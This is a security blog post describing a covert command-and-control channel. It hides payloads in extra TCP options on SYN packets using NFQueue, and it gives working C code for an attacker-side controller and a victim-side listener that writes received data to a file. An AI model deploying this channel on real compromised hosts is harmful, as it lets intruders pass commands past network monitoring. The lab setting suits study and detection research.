Command and Control via TCP Handshake

Quick Intro/Disclaimer

This is my first blog post, so please let me know if there’s any way I can improve it. I expect it to have inaccuracies and parts that could be explained better, and I would appreciate a quick note if any of you notice them! So, all that BS aside, let’s get into it.

 
Quick disclaimer: the method presented here probably doesn’t have much use or application in a real red teaming scenario. The main reason: you need root on the victim machine at some point for it to work at all, although once you have had it you can configure the victim system so it is not needed again. I wrote this primarily because I thought it was a cool and creative way to exfiltrate or infiltrate data with hilarious stealth.

Background

Command and control is pretty widely known across the security world. You set up a listener on a victim machine and send it commands that it then executes, hopefully with root. People have a lot of creative ways to hide the commands that are sent: Cobalt Strike uses timed delays with its beacons, WireGuard can be used to encrypt data in transit, etc. The problem with all these approaches is that anyone (or anything) monitoring data transfer at the right time and place has the potential to catch these threats. But who the hell looks so closely at SYN packets?



Initial Info

If you know the structure of an IPv4 or TCP packet, or are OK with checking back to see what part of the packet I’m talking about, skip ahead.

IPv4 packets are structured as shown in this image.

"IPv4 Packet Structure"

TCP packets are structured as shown in this image.

"TCP Packet Structure"



Not much space to hide any data. That makes perfect sense because handshake packets are meant to establish a connection and define parameters for it, not send data themselves. Much of the packet is pre-defined or will cause problems with the connection if changed, like port, flags, etc. The sequence number can encode 4 bytes of data at a time to infiltrate data, but this isn’t good enough. 4 bytes per second might be acceptable for RCE to a server on the Moon in 1969 but we need something that can at least carry the equivalent of a full sentence in English. Meet: the options field.

TCP options are absolutely vital in modern-day connections. They define how data will be transferred from one endpoint to the other. A TCP header can be at most 60 bytes, because its length is stored in the 4-bit Data Offset field, which counts 32-bit words (15 words of 4 bytes each). The fixed part of the header takes 20 bytes, so there’s a whopping 40 bytes of space available for TCP options. Ten times more than what we just saw! Through research online, I found claims that the 40-byte limit only matters for packets that need to be legit, and that an extra-long options portion will only be truncated if the packet is re-segmented when it goes through one of its hops. The firewall would (I assume) need to have this limit hardcoded and ignore the Total Length field of the IPv4 header to truncate the extra bytes.

However, for the purpose of this experiment we are gonna assume that doesn’t happen and the packet is sent through as it is. In order to add options to the TCP packet, we need to update the “Data Offset” field, which lists the number of 32-bit words in the TCP header. The fixed TCP header is 5 words (20 bytes / 4 bytes per word = 5) and the largest value the 4-bit Data Offset can hold is 15, leaving us 10 words to work with: the 40 bytes of options mentioned above. The SYN we modify later already has a 40-byte header and we add 16 bytes, which lands at 56 bytes and stays inside the limit. Enough for a short command.
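To make the arithmetic concrete, here is a small sketch of how the Data Offset field bounds the header. It assumes the standard 4-bit width of the field; the function and macro names are made up for illustration and are not part of the project.

```c
#include <assert.h>
#include <stdint.h>

#define TCP_FIXED_HDR_WORDS 5u   /* 20-byte header without options */
#define TCP_MAX_DOFF        15u  /* largest value a 4-bit field can hold */

/* Header length in bytes for a given Data Offset value (in 32-bit words). */
unsigned tcp_header_len_bytes(unsigned doff) {
    assert(doff >= TCP_FIXED_HDR_WORDS && doff <= TCP_MAX_DOFF);
    return doff * 4u;
}

/* Bytes of option space still free in a header with the given Data Offset. */
unsigned tcp_free_option_bytes(unsigned doff) {
    return (TCP_MAX_DOFF * 4u) - tcp_header_len_bytes(doff);
}
```

A bare header (Data Offset 5) has 40 bytes free. A SYN whose header is already 40 bytes long (Data Offset 10) has 20 bytes free, so a 16-byte block still fits.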

In addition, although we won’t mess with this in the experimental setup, there is an experimental option that IANA has acknowledged that lets you extend the Data Offset portion by even more. Here’s a link for those that want to read more into it.

NFQueue

Netfilter provides an iptables target called NFQueue (NFQUEUE in iptables rules) to bridge the gap between intercepting packets in the kernel and being able to read and modify them from your own program in userspace. It relies on the libnetfilter_queue library and (initially) root access, which sucks, but it won’t stop us. For now, everything will be done as root, but for future work any user with CAP_NET_ADMIN capabilities on the victim can perform this attack as well.

Back to the topic at hand: NFQueue copies packets from kernel space to userspace, where anyone with the right privileges can mess with them and then give a verdict. This verdict could be your everyday accept or drop (NF_ACCEPT, NF_DROP), or one of the special NF_REPEAT or NF_QUEUE, which respectively reinject the packet so it goes through the hook again or send it to a different NFQueue listener.

Enough talk. Time to code.

Building the test environment

The test environment I set up is two Ubuntu 18.04 LTS server VMs, each with the libnetfilter-queue-dev dependencies installed. I refer to one as the listener (the victim machine) and the other as the controller (the attacking machine).

Writing the code

I will be going over how the code actually works. If you just wanna see Wireshark pictures and the result, skip ahead to the screenshots.

Some stupid college kid boiled some plates

NFQueue needs a big chunk of boilerplate code to get started. No one wants to write all that code themselves, so neither will we. The boilerplate I have made for us is a heavily modified version of the Hello World found here.

Initial commit for the controller can be found here

Initial commit for the listener can be found here

Breaking down the boilerplate

Lots of code here, let’s go over it real quick.


tcp_pkt_struct.h

#pragma pack(push, 1)
typedef struct {
    struct iphdr ipv4_header;
    struct tcphdr tcp_header;
} full_tcp_pkt_t;
#pragma pack(pop)

This is what we will use to modify packet headers. NFQueue just gives us a raw array of bytes; it’s up to us to figure out what to do with it. Notice that struct iphdr and struct tcphdr come directly from the Linux networking headers.
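One thing worth keeping in mind: laying struct tcphdr directly after struct iphdr assumes the IPv4 header is exactly 20 bytes, i.e. it carries no IP options. A rough sketch of locating the TCP header without that assumption is below. It works on raw bytes so it has no dependencies, and the helper names are hypothetical, not from the project.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* IPv4 header length in bytes: the low nibble of byte 0 (IHL) counts 32-bit words. */
size_t ipv4_header_len(const uint8_t *pkt) {
    assert(pkt != NULL);
    return (size_t)(pkt[0] & 0x0f) * 4;
}

/* Returns a pointer to the TCP header inside a raw IPv4 packet,
 * or NULL if the buffer is not IPv4/TCP or is too short. */
const uint8_t *find_tcp_header(const uint8_t *pkt, size_t len) {
    if (pkt == NULL || len < 20 || (pkt[0] >> 4) != 4)
        return NULL;                                  /* version must be 4 */
    size_t ihl = ipv4_header_len(pkt);
    if (ihl < 20 || len < ihl + 20)
        return NULL;                                  /* need a full fixed TCP header */
    if (pkt[9] != 6)
        return NULL;                                  /* protocol 6 = TCP */
    return pkt + ihl;
}
```

For the SYN packets in this experiment the IHL is 5 (20 bytes), so the packed struct and this lookup agree.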

main.c

We will treat three functions as a black box (we know what they do but not how they do it). Mostly because I found them on Google and actually have no idea how they work.

long ipcsum(unsigned char *buf, int length);
void tcpcsum(struct iphdr *pIph, unsigned short *ipPayload);
void rev(void *start, int size);

ipcsum and tcpcsum calculate the checksums of the IPv4 header and the TCP segment. rev reverses the bytes starting at the passed-in pointer for size bytes, so 01 02 03 will become 03 02 01. We will use this to fight the battle between network byte order (big endian) and the host byte order of my Linux machines (little endian).
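For anyone who wants to peek inside the black box, here is a minimal sketch of what helpers like these typically do: an in-place byte reversal and the standard Internet checksum (RFC 1071). These are not the functions from the repository; rev_bytes and inet_checksum are names made up here, and the real ipcsum may differ in return type and byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Reverse `size` bytes in place: 01 02 03 becomes 03 02 01. */
void rev_bytes(void *start, size_t size) {
    unsigned char *p = start;
    for (size_t i = 0; i < size / 2; i++) {
        unsigned char tmp = p[i];
        p[i] = p[size - 1 - i];
        p[size - 1 - i] = tmp;
    }
}

/* Internet checksum: one's-complement sum of 16-bit big-endian words,
 * folded to 16 bits and inverted. Returned in host byte order. */
uint16_t inet_checksum(const uint8_t *buf, size_t len) {
    assert(buf != NULL || len == 0);
    uint32_t sum = 0;
    size_t i = 0;
    for (; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (i < len)                        /* odd trailing byte is padded with zero */
        sum += (uint32_t)buf[i] << 8;
    while (sum >> 16)                   /* fold carries back into the low 16 bits */
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}
```

For the IPv4 header, the checksum field is zeroed and the function runs over the 20 header bytes. The TCP checksum uses the same sum but also covers a pseudo-header (source address, destination address, protocol, TCP length) in front of the segment, which is why it gets its own function.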

Now let’s look at the non-blackbox functions.

int main();
static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, ...);
static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len);

The main function loads packets from the sk_buff and writes them into a statically allocated 4098-byte buffer. 4098 bytes is overkill for SYN packets. Change it if you want; you don’t have to for experimental purposes.

cb is the callback that handles each packet as it enters sk_buff, and modify_handshk_pkt modifies or reads the packet as needed.


Plan of attack

Let’s take a look at a SYN packet in Wireshark to see what we are working with. I ran a simple web server on port 8000 on the listener:

python3 -m http.server &

Curl the server from the controller

Let’s look at what Wireshark shows (filtered for just SYN packets)


Analysis


The portion that is highlighted in white, `02 04 05 b4` is where the TCP options start. TCP options are placed one after another in the format "Option-Kind: 1 byte - Option-Length: 1 byte - Option-value: value of length - 2 bytes". The option length defines the length for ALL bytes in the option, including the byte used for the kind and length itself. In this case, `02` represents the Maximum Segment Size, has a length of `04`, and a value of `05b4`.
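The kind/length/value layout described above can be walked with a few lines of C. The sketch below is an illustration under the usual TCP rules (kind 0 ends the list, kind 1 is a single-byte NOP, everything else carries a length byte); find_tcp_option and the OPT_KIND_* names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OPT_KIND_EOL 0   /* End of Option List: single byte, stops parsing */
#define OPT_KIND_NOP 1   /* No-Operation: single byte of padding */

/* Scan `opts` (the bytes after the fixed 20-byte TCP header) for an option
 * of the given kind (2 or higher). Returns a pointer to its kind byte,
 * or NULL if the option is absent or the list is malformed. */
const uint8_t *find_tcp_option(const uint8_t *opts, size_t len, uint8_t kind) {
    assert(opts != NULL || len == 0);
    size_t i = 0;
    while (i < len) {
        uint8_t k = opts[i];
        if (k == OPT_KIND_EOL)
            return NULL;
        if (k == OPT_KIND_NOP) {
            i++;                           /* NOP has no length byte */
            continue;
        }
        if (i + 1 >= len)
            return NULL;                   /* no room for the length byte */
        uint8_t optlen = opts[i + 1];      /* counts kind and length bytes too */
        if (optlen < 2 || i + optlen > len)
            return NULL;
        if (k == kind)
            return &opts[i];
        i += optlen;
    }
    return NULL;
}
```

Run against the bytes `02 04 05 b4`, a lookup for kind 2 returns a pointer to the `02`, and the two value bytes after the length decode to 0x05b4, i.e. an MSS of 1460.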

Notice Header Length: 40 bytes further up in Wireshark’s description of the packet. This is a converted form of the Data Offset field.

So in order to add options at the end, we will need to update the Total Length in the IPv4 header (look back if you don’t remember) and increase the Data Offset by the number of 32-bit (4-byte) words in our options. This also means that the total length of everything we add to the packet has to be a multiple of 4 bytes (you can’t have a fractional Data Offset). We can pad the options with 0x01 bytes (No-Operation) for this purpose.
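The padding rule boils down to rounding the option length up to the next multiple of 4. A tiny sketch, with helper names invented for this example:

```c
#include <assert.h>
#include <stddef.h>

/* Number of NOP (0x01) bytes needed so an option of `opt_len` bytes
 * (kind + length + value) fills a whole number of 32-bit words. */
size_t nop_padding_for(size_t opt_len) {
    assert(opt_len >= 2);               /* kind and length bytes are always present */
    return (4 - opt_len % 4) % 4;
}

/* How many words the Data Offset grows once the padded option is appended. */
size_t doff_increase_for(size_t opt_len) {
    return (opt_len + nop_padding_for(opt_len)) / 4;
}
```

A 14-byte option needs 2 NOP bytes, giving 16 bytes in total, so the Data Offset goes up by 4 and the IPv4 Total Length by 16.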


The Storm of Code - Controller

The legit way to add extra data to the TCP packet would be to use an experimental option. However, we want to hide, so let’s use an option that will be very common, like User Timeout (0x1c or 28). IANA has a list of option assignments on their page.

So let’s add to the code.


tcp_pkt_struct.h

Insert code at the top

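#include <stdint.h>

#define METADATA_SIZE 16

#pragma pack(push, 1)
typedef struct {
    uint16_t padding;   /* two NOP bytes so the block is a multiple of 4 */
    uint8_t opt;        /* option kind */
    uint8_t len;        /* option length, counting the kind and length bytes */
    uint32_t payload;   /* payload, split into three 4-byte chunks */
    uint32_t payload_2;
    uint32_t payload_3;
} pkt_meta;
#pragma pack(pop)

...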

The option has a kind, a length, and a payload, which is a string we will write to a file on the victim. The padding at the beginning keeps the total length divisible by 4. Because the data is appended directly to the packet, the payload has to live inside the struct itself rather than behind a pointer. I split it into three chunks of 4 bytes; a fixed-size 12-byte array would lay out the same way.
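To see the byte layout this struct produces, here is a sketch that builds the same 16 bytes into a plain buffer: two NOPs, the kind, the length, then 12 payload bytes. build_meta and the META_* macros are made up for this example (META_SIZE mirrors METADATA_SIZE), and zero-padding short payloads is an assumption of the sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define META_SIZE    16   /* mirrors METADATA_SIZE */
#define META_PAYLOAD 12   /* three 4-byte chunks */

/* Fill `out` with: two NOPs, kind 0x1c, length 14, then up to 12 payload
 * bytes (zero-padded). Returns the number of payload bytes copied. */
size_t build_meta(uint8_t out[META_SIZE], const void *payload, size_t len) {
    assert(out != NULL);
    if (len > META_PAYLOAD)
        len = META_PAYLOAD;             /* oversized input is truncated */
    memset(out, 0, META_SIZE);
    out[0] = 0x01;                      /* NOP padding */
    out[1] = 0x01;
    out[2] = 0x1c;                      /* option kind 28 */
    out[3] = META_SIZE - 2;             /* kind + length + payload = 14 */
    if (len > 0)
        memcpy(out + 4, payload, len);
    return len;
}
```

Writing into a byte buffer like this sidesteps endianness questions for the payload, since the bytes go on the wire in the order they are copied.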


main.c

static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {
    /* Should match only SYN packets */
    printf("\nPacket intercepted: \n");
    if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
        printf("\tPacket type: SYN\n");
        /* The metadata block starts right after the last byte of the original packet */
        pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len);
        metadata->padding = 0x0101; // Two NOP bytes
        metadata->opt = 0x1c; // Custom option kind. 28 = User Timeout
        metadata->len = METADATA_SIZE - sizeof(metadata->padding); // Custom option length. Default length of User Timeout is different.
        /* Note: this snippet does not set payload, payload_2 or payload_3; fill them in here. */
        pkt->tcp_header.doff += METADATA_SIZE / 4; // Change data offset
    }
}

We added in all the code relevant to the TCP packet. At the end, we change the data offset to reflect the additional options. Let’s move onto the callback where the packet is finally sent on its way.


static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) {
    u_int32_t id;

    struct nfqnl_msg_packet_hdr *ph;
    ph = nfq_get_msg_packet_hdr(nfa);
    id = ntohl(ph->packet_id);
    printf("entering callback\n");

    full_tcp_pkt_t *ipv4_payload = NULL;
    int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);
    modify_handshk_pkt(ipv4_payload, pkt_len);

    /* tot_len is stored in network byte order: flip it, add, flip it back */
    rev(&ipv4_payload->ipv4_header.tot_len, 2);
    ipv4_payload->ipv4_header.tot_len += METADATA_SIZE;
    rev(&ipv4_payload->ipv4_header.tot_len, 2);

    /* The checksum field must be zero while the new checksum is computed */
    ipv4_payload->ipv4_header.check = 0;
    ipv4_payload->ipv4_header.check =
        ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20);
    rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

    tcpcsum(&ipv4_payload->ipv4_header,
            (unsigned short *)&ipv4_payload->tcp_header);

    /* Accept the packet and hand back the enlarged buffer */
    int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len + METADATA_SIZE,
                              (void *) ipv4_payload);
    printf("\n Set verdict status: %s\n", strerror(errno));
    return ret;
}

We extend the Total Length of the IPv4 packet so the TCP segment doesn’t get truncated on its way to the destination. The field is stored in network byte order (big endian) while the Linux system I was using is little endian, so I had to reverse the bytes first, add the length, and reverse the bytes again. This may not be the case for you guys. You can confirm it by seeing if the total length increases by 0x0010 bytes or by 0x1000 bytes. We then recalculate the IP and TCP checksums, reversing the bytes as necessary. (On systems with checksum offloading the TCP checksum is often left for the NIC to fill in, but let’s compute it anyway.)
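The reverse, add, reverse dance on Total Length can also be written with ntohs and htons, which do the right thing on either endianness. A minimal sketch; adjust_tot_len is a made-up helper name, not part of the project:

```c
#include <arpa/inet.h>   /* ntohs, htons */
#include <assert.h>
#include <stdint.h>

/* Add `delta` bytes to an IPv4 Total Length field stored in network byte order. */
void adjust_tot_len(uint16_t *tot_len_net, int delta) {
    long updated = (long)ntohs(*tot_len_net) + delta;
    assert(updated >= 20 && updated <= 65535);   /* must remain a valid IPv4 length */
    *tot_len_net = htons((uint16_t)updated);
}
```

On a little-endian host ntohs and htons swap the two bytes, and on a big-endian host they do nothing, so the 0x0010 versus 0x1000 check described above is no longer needed. A negative delta covers the listener side, where the same 16 bytes are removed again.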


Fruit of labour


Let’s see the result of our work. Make a build folder and build the entire project using CMake. Then upload to the controller. There’s an iptables rule in iptables_rules.sh that intercepts SYN packets on port 8000 and sends them to queue 0. If nothing is listening on queue 0 then it simply sends the SYN on its way.

Steps

  1. Create build folder and build project
  2. Upload build folder and iptables_rules.sh file to controller.
  3. Run iptables_rules.sh as root on controller (only if the system was restarted or this is the first upload)
  4. Run main in the build folder as root on controller
  5. Start up Wireshark on listener filtering on packets on port 8000 to view the result (to make sure it was received)
  6. Send HTTP request from controller to listener on port 8000

Controller Screenshot

Controller Wireshark

Awesome! The SYN packet in that whole HTTP request has our data added to the end. No kernel programming necessary. Notice that the User timeout is supposed to be 4 bytes and we set it to 14. If you want to be extra stealthy you can use multiple options and break your payload into their individual default lengths so there isn’t an anomaly. For this experiment, we don’t care. :P

The Storm of Code - Listener

Cool, we modified a packet from the controller. Big whoop. But now we have to do something with that payload.

The code in the listener is the exact same for the boilerplate and tcp_pkt_struct.h so refer back if you forgot about them. Let’s go right into main.c.

main.c

int write_to_file(unsigned char *payload, int len) {
    int output_fd;
    ssize_t ret_out;

    output_fd = open("virusfile.pup", O_WRONLY | O_CREAT, 0644);
    if (output_fd == -1) {
        perror("open virus file");
        return 3;
    }
    ret_out = write(output_fd, payload, len);
    if (ret_out == -1) { // Report a failed write instead of ignoring it
        perror("write virus file");
        close(output_fd);
        return 4;
    }
    close(output_fd);
    return 0;
}

static void modify_handshk_pkt(full_tcp_pkt_t *pkt, int pkt_len) {
    /* Should match only SYN packets */
    printf("\nPacket intercepted: \n");
    if (pkt->tcp_header.syn == 1 && pkt->tcp_header.ack == 0) {
        printf("\tPacket type: SYN\n");
        /* The metadata block occupies the last METADATA_SIZE bytes of the packet */
        pkt_meta *metadata = (pkt_meta *)((unsigned char *)pkt + pkt_len - METADATA_SIZE);
        unsigned char *payload = (unsigned char *)(&metadata->payload);
        int payload_len = METADATA_SIZE - (sizeof(metadata->padding) + sizeof(metadata->opt) + sizeof(metadata->len));
        write_to_file(payload, payload_len);
        /* The payload is not NUL-terminated, so bound the print by its length */
        printf("RECEIVED PAYLOAD: %.*s", payload_len, payload);
        pkt->tcp_header.doff -= METADATA_SIZE / 4;
    }
}

We basically do the opposite of what we did in the controller when reading the packet. The pointer for the metadata has to be after the original size of the packet, and instead of writing to the metadata we read from it. Then, we write the payload to a file and reduce the Data Offset back to the initial value.
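One gap in the listener as shown is that it trusts the last 16 bytes of every SYN, whether or not the controller actually appended anything. A hedged sketch of a check that could run first is below. It works on raw bytes; extract_payload and the META_* names are hypothetical, and the 40-byte minimum assumes a 20-byte IP header plus the 20-byte fixed TCP header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define META_SIZE    16     /* mirrors METADATA_SIZE */
#define META_PAYLOAD 12
#define META_KIND    0x1c   /* option kind used by the controller */

/* Copy the 12 payload bytes out of the trailing metadata block.
 * Returns 0 on success, -1 if the packet is too short or its last
 * 16 bytes do not look like the block the controller appends. */
int extract_payload(const uint8_t *pkt, size_t pkt_len, uint8_t out[META_PAYLOAD]) {
    assert(pkt != NULL && out != NULL);
    if (pkt_len < 40 + META_SIZE)
        return -1;                                   /* 20 IP + 20 TCP + block */
    const uint8_t *meta = pkt + pkt_len - META_SIZE;
    if (meta[0] != 0x01 || meta[1] != 0x01)
        return -1;                                   /* expected NOP padding */
    if (meta[2] != META_KIND || meta[3] != META_SIZE - 2)
        return -1;                                   /* expected kind and length */
    memcpy(out, meta + 4, META_PAYLOAD);
    return 0;
}
```

If the check fails, the packet can be accepted untouched instead of being shortened by 16 bytes, so ordinary SYNs on the same port keep working.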


static int cb(struct nfq_q_handle *qh, struct nfgenmsg *nfmsg, struct nfq_data *nfa, void *data) {
    u_int32_t id;

    struct nfqnl_msg_packet_hdr *ph;
    ph = nfq_get_msg_packet_hdr(nfa);
    id = ntohl(ph->packet_id);
    printf("entering callback\n");

    full_tcp_pkt_t *ipv4_payload = NULL;
    int pkt_len = nfq_get_payload(nfa, (unsigned char **) &ipv4_payload);
    modify_handshk_pkt(ipv4_payload, pkt_len);

    /* tot_len is stored in network byte order: flip it, subtract, flip it back */
    rev(&ipv4_payload->ipv4_header.tot_len, 2);
    ipv4_payload->ipv4_header.tot_len -= METADATA_SIZE;
    rev(&ipv4_payload->ipv4_header.tot_len, 2);

    /* The checksum field must be zero while the new checksum is computed */
    ipv4_payload->ipv4_header.check = 0;
    ipv4_payload->ipv4_header.check =
        ipcsum((unsigned char *)&ipv4_payload->ipv4_header, 20);
    rev(&ipv4_payload->ipv4_header.check, 2); // Convert between endians

    tcpcsum(&ipv4_payload->ipv4_header,
            (unsigned short *)&ipv4_payload->tcp_header);

    /* Accept the packet, passing the shorter length so the metadata is cut off */
    int ret = nfq_set_verdict(qh, id, NF_ACCEPT, (u_int32_t) pkt_len - METADATA_SIZE,
                              (void *) ipv4_payload);
    printf("\n Set verdict status: %s\n", strerror(errno));
    return ret;
}

Again, we just reverse what we did earlier: reduce the Total Length, recalculate the checksums, and pass the shorter length to nfq_set_verdict so the libnetfilter_queue library truncates the packet it sends on.


Proving it worked

Let’s look at some screenshots to see that it worked.

Steps to build:

  1. Build the project as shown for the controller
  2. Note that iptables_rules.sh captures on PREROUTING and not POSTROUTING to intercept packets coming into the system. Upload and run iptables scripts as shown in controller.
  3. Use iptables_clean.sh if you mess up (note that it flushes a ton of rules because I’m lazy) or remove the rule manually and try again.
  4. Run the server executable in build directory on the listener

Listener packet interception

Cool! We intercepted the SYN packet coming in, and received the payload. Let’s make sure we could write it to a file (you can do anything you want with the payload once you have it).


Listener file contents

And there you go. The payload was intercepted, the packet was truncated (I couldn’t find a screenshot to prove that, but you can see for yourself if you run it), and the endpoint is none the wiser. The firewall probably doesn’t have the resources to read the options of every single SYN packet coming in, especially in a large-scale environment with lots of inbound connections.

Conclusions

This is just a Hello World example of what can be done with NFQueue from a red teaming perspective during post-exploitation. The easiest way to hide something in network traffic is to hide in numbers, and we have done just that. There isn’t anything more common than an incoming SYN packet to a server.

However, this method does require root privileges on the victim system, or CAP_NET_ADMIN capabilities for a compromised user. Additionally, the libnetfilter_queue dependency must be installed on the victim, meaning that for now this method will only work on systems with netfilter and the NFQueue extension installed (so far I could only find it working on Linux). It may also work on BSD systems using divert sockets, but I have not tried that; per the documentation, the limitations are similar to those of the Linux method.

I plan to find a way to hide the payload better within TCP options by researching more into default lengths and commonly used option kinds. Additionally, I’m trying to construct an environment where the TCP packet is re-segmented and possibly truncated if the handshake packet is more than 60 bytes.

Future learning

This is my first time making a blog post. Please contact me at thesw4rm@pm.me if you want to discuss anything tech-based with me. Definitely please let me know of anything that can be improved, whether this method is actually applicable in a real engagement, or any way I can improve it so it becomes that way. Peace guys!